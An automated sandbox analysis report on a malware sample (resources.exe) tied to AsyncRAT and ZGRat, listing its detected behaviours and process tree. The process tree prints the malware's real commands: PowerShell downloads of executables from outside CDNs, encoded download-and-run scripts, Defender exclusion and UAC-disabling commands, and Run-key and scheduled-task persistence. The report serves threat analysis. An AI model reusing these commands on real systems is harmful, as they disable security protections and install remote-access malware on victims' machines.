Analysis Overview
SHA256
f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Threat Level: Known bad
The file resources.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Detect ZGRat V1
AsyncRat
ZGRat
Async RAT payload
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Drops startup file
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies registry class
Delays execution with timeout.exe
Modifies registry key
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-15 10:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-15 10:45
Reported
2023-11-15 10:48
Platform
win7-20231023-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\resources.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2124 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2124 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2124 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2124 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 820
Network
Files
memory/2124-0-0x0000000000880000-0x0000000000896000-memory.dmp
memory/2124-1-0x0000000074530000-0x0000000074C1E000-memory.dmp
memory/2124-3-0x0000000074530000-0x0000000074C1E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-15 10:45
Reported
2023-11-15 10:48
Platform
win10v2004-20231023-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\israil.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\israil2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\2WinDefault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\OperaCrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VisualStudioo.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5400 set thread context of 5636 | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5492 set thread context of 5860 | N/A | C:\Users\Admin\AppData\Roaming\OperaCrt.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5892 set thread context of 2212 | N/A | C:\Users\Admin\AppData\Roaming\VisualStudioo.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5896 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 2212 set thread context of 1132 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
C:\Users\Public\Music\RunNihaiersion.exe
RunNihaiersion.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil.exe
"C:\Users\Public\Music\israil.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
C:\Users\Public\Music\RunihaiVersion.exe
RunihaiVersion.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil2.exe
"C:\Users\Public\Music\israil2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
C:\Users\Admin\AppData\Local\Temp\xx.exe
xx.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\zhXaQqWy8P.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="
C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
C:\Users\Admin\AppData\Roaming\WiDefault.exe
"C:\Users\Admin\AppData\Roaming\WiDefault.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6088 -ip 6088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 808
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\schtasks.exe
